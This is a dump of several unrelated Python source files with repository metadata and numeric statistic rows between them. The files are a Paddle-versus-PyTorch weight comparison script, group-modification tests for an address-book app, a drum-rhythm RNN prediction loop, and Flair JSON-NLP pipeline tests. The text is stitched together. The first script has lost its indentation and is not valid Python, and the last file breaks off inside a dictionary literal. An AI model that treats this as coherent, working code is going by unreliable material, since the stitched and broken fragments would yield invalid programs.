model_dic_paddle[key] = value.numpy()
for key, value in model_dic_paddle.items():
value2 = model_dic_pytorch[key]
ddd = np.sum((value - value2) ** 2)
# if ddd > 1.00001:
# print(key)
print('diff=%.6f (%s)' % (ddd, key))
print('==============================================')
print()
# ======================== mapping_ema ========================
print('======================== mapping_ema ========================')
model_dic_pytorch = {}
for key, value in state_dict_pytorch['mapping_ema'].items():
model_dic_pytorch[key] = value.numpy()
ckpt_file = 'mapping_ema_19.pdparams'
state_dict = paddle.load(ckpt_file)
model_dic_paddle = {}
for key, value in state_dict.items():
model_dic_paddle[key] = value.numpy()
for key, value in model_dic_paddle.items():
value2 = model_dic_pytorch[key]
ddd = np.sum((value - value2) ** 2)
# if ddd > 1.00001:
# print(key)
print('diff=%.6f (%s)' % (ddd, key))
print('==============================================')
print()
# ======================== mapping ========================
print('======================== mapping ========================')
model_dic_pytorch = {}
for key, value in state_dict_pytorch['mapping'].items():
model_dic_pytorch[key] = value.numpy()
ckpt_file = 'mapping_19.pdparams'
state_dict = paddle.load(ckpt_file)
model_dic_paddle = {}
for key, value in state_dict.items():
model_dic_paddle[key] = value.numpy()
for key, value in model_dic_paddle.items():
value2 = model_dic_pytorch[key]
ddd = np.sum((value - value2) ** 2)
# if ddd > 1.00001:
# print(key)
print('diff=%.6f (%s)' % (ddd, key))
print('==============================================')
print()
| 25.863946 | 72 | 0.546554 | 447 | 3,802 | 4.389262 | 0.09396 | 0.122324 | 0.114679 | 0.099388 | 0.88634 | 0.855759 | 0.855759 | 0.855759 | 0.855759 | 0.834862 | 0 | 0.021532 | 0.144924 | 3,802 | 146 | 73 | 26.041096 | 0.581975 | 0.144135 | 0 | 0.75 | 0 | 0 | 0.249612 | 0.182016 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0375 | 0 | 0.0375 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
243a085a451432e8407fe0fe1e48d2c3ec9a99c0 | 1,960 | py | Python | test/test_modify_group.py | Manolaru/Python_Study | 10be0a711f4a580c1122a07d7fc935800a04ee5b | [
"Apache-2.0"
] | null | null | null | test/test_modify_group.py | Manolaru/Python_Study | 10be0a711f4a580c1122a07d7fc935800a04ee5b | [
"Apache-2.0"
] | null | null | null | test/test_modify_group.py | Manolaru/Python_Study | 10be0a711f4a580c1122a07d7fc935800a04ee5b | [
"Apache-2.0"
] | null | null | null | from model.group import Group
import random
def test_modify_group_name(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="testing"))
old_groups = db.get_group_list()
group = random.choice(old_groups)
list_index = old_groups.index(group)
group.name = "NewGroup"
app.group.modify_group_by_id(group)
new_groups = db.get_group_list()
assert len(old_groups) == len (new_groups)
old_groups[list_index]=group
assert old_groups == new_groups
if check_ui:
new = sorted(new_groups, key=Group.id_or_max)
ui= sorted(app.group.get_group_list(), key=Group.id_or_max)
assert new == ui
def test_modify_group_header(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="testing"))
old_groups = db.get_group_list()
group = random.choice(old_groups)
list_index = old_groups.index(group)
group.header = "NewHeader"
app.group.modify_group_by_id(group)
new_groups = db.get_group_list()
assert len(old_groups) == len (new_groups)
old_groups[list_index]=group
assert old_groups == new_groups
if check_ui:
new = sorted(new_groups, key=Group.id_or_max)
ui= sorted(app.group.get_group_list(), key=Group.id_or_max)
assert new == ui
def test_modify_group_footer(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="testing"))
old_groups = db.get_group_list()
group = random.choice(old_groups)
list_index = old_groups.index(group)
group.footer = "NewFooter"
app.group.modify_group_by_id(group)
new_groups = db.get_group_list()
assert len(old_groups) == len (new_groups)
old_groups[list_index]=group
assert old_groups == new_groups
if check_ui:
new = sorted(new_groups, key=Group.id_or_max)
ui= sorted(app.group.get_group_list(), key=Group.id_or_max)
assert new == ui
| 35.636364 | 67 | 0.688265 | 304 | 1,960 | 4.121711 | 0.121711 | 0.12929 | 0.114924 | 0.100559 | 0.909816 | 0.909816 | 0.909816 | 0.909816 | 0.909816 | 0.909816 | 0 | 0.001901 | 0.194898 | 1,960 | 54 | 68 | 36.296296 | 0.792142 | 0 | 0 | 0.84 | 0 | 0 | 0.023992 | 0 | 0 | 0 | 0 | 0 | 0.18 | 1 | 0.06 | false | 0 | 0.04 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24668fb32e293136adce5073b78af2ca888db383 | 101 | py | Python | src/match_pattern/utils/__init__.py | elsid/master | b3624a6fb3a007fff005c0811f05c5802344b46b | [
"MIT"
] | null | null | null | src/match_pattern/utils/__init__.py | elsid/master | b3624a6fb3a007fff005c0811f05c5802344b46b | [
"MIT"
] | null | null | null | src/match_pattern/utils/__init__.py | elsid/master | b3624a6fb3a007fff005c0811f05c5802344b46b | [
"MIT"
] | null | null | null | # coding: utf-8
from utils.cached_eq import cached_eq
from utils.cached_method import cached_method
| 20.2 | 45 | 0.831683 | 17 | 101 | 4.705882 | 0.529412 | 0.225 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011236 | 0.118812 | 101 | 4 | 46 | 25.25 | 0.88764 | 0.128713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
79f26f23d034141fcb92a0a7ba6b3ff53bdb89de | 917 | py | Python | tests_rnn.py | Cyril-Grl/MuGen | 3f4d5b104f3f3b4dffe884e9cbf2e30625ba0d75 | [
"MIT"
] | null | null | null | tests_rnn.py | Cyril-Grl/MuGen | 3f4d5b104f3f3b4dffe884e9cbf2e30625ba0d75 | [
"MIT"
] | 1 | 2021-11-11T08:26:32.000Z | 2021-11-11T08:26:32.000Z | tests_rnn.py | Cyril-Grl/MuGen | 3f4d5b104f3f3b4dffe884e9cbf2e30625ba0d75 | [
"MIT"
] | 1 | 2020-07-15T19:33:29.000Z | 2020-07-15T19:33:29.000Z | # import src.VAE
#
# src.VAE.train()
# import src.train
import numpy as np
from src.data import get_drum
from src.models import get_model
model = get_model('src/rnn_10_classes.h5')
for i in range(1, 100):
try:
data = get_drum('datasets/quantized_rythm_dataset/0/random_' + str(i) + '.mid')
prediction = model.predict(np.stack([data.astype(dtype=float)]))
index_max = np.argmax(prediction)
pred = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10][index_max]
print(f'{i} : {pred}')
except Exception:
pass
for i in range(1, 100):
try:
data = get_drum('datasets/quantized_rythm_dataset/100/generated_' + str(i) + '.mid')
prediction = model.predict(np.stack([data.astype(dtype=float)]))
index_max = np.argmax(prediction)
pred = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10][index_max]
print(f'{i} : {pred}')
except Exception:
pass
| 28.65625 | 92 | 0.607415 | 141 | 917 | 3.829787 | 0.397163 | 0.059259 | 0.022222 | 0.040741 | 0.718519 | 0.718519 | 0.718519 | 0.718519 | 0.718519 | 0.718519 | 0 | 0.055714 | 0.236641 | 917 | 31 | 93 | 29.580645 | 0.715714 | 0.051254 | 0 | 0.727273 | 0 | 0 | 0.164162 | 0.127168 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.090909 | 0.136364 | 0 | 0.136364 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
031d3ac3d73d8678d7ab570ba99b12d4abd83241 | 27,274 | py | Python | tests/test_flairjsonnlp.py | dcavar/Flair-JSON-NLP | 99b036eb934c720af1d245d2d27a174589d58a1e | [
"Apache-2.0"
] | 11 | 2019-03-26T22:20:24.000Z | 2020-07-06T13:38:51.000Z | tests/test_flairjsonnlp.py | dcavar/Flair-JSON-NLP | 99b036eb934c720af1d245d2d27a174589d58a1e | [
"Apache-2.0"
] | null | null | null | tests/test_flairjsonnlp.py | dcavar/Flair-JSON-NLP | 99b036eb934c720af1d245d2d27a174589d58a1e | [
"Apache-2.0"
] | 3 | 2019-03-27T19:31:07.000Z | 2020-11-13T01:32:00.000Z | from collections import OrderedDict
from unittest import TestCase
from pyjsonnlp import validation
from flairjsonnlp import FlairPipeline
from . import mocks
import pytest
text = "Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash."
def strip_scores(j):
"""Scores are non-deterministic"""
for s in j['documents'][1]['sentences']:
for label in s.get('labels', []):
label['scores']['label'] = 0
for e in j['documents'][1]['expressions']:
e['scores']['type'] = 0
for t in j['documents'][1]['tokenList']:
t['scores']['upos'] = 0
t['scores']['xpos'] = 0
t['scores']['entity'] = 0
if 'synsets' in t:
t['synsets'][0]['scores']['wordnetId'] = 0
class TestFlair(TestCase):
def test_process(self):
actual = FlairPipeline().process(text, fast=False, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VB', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'crash.v.01', 'scores': {'wordnetId': 0}}]}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_fast(self):
actual = FlairPipeline().process(text, fast=True, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': '.', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_ontonotes(self):
actual = FlairPipeline().process(text, fast=True, use_ontonotes=True)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-GPE', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'be.a.01', 'scores': 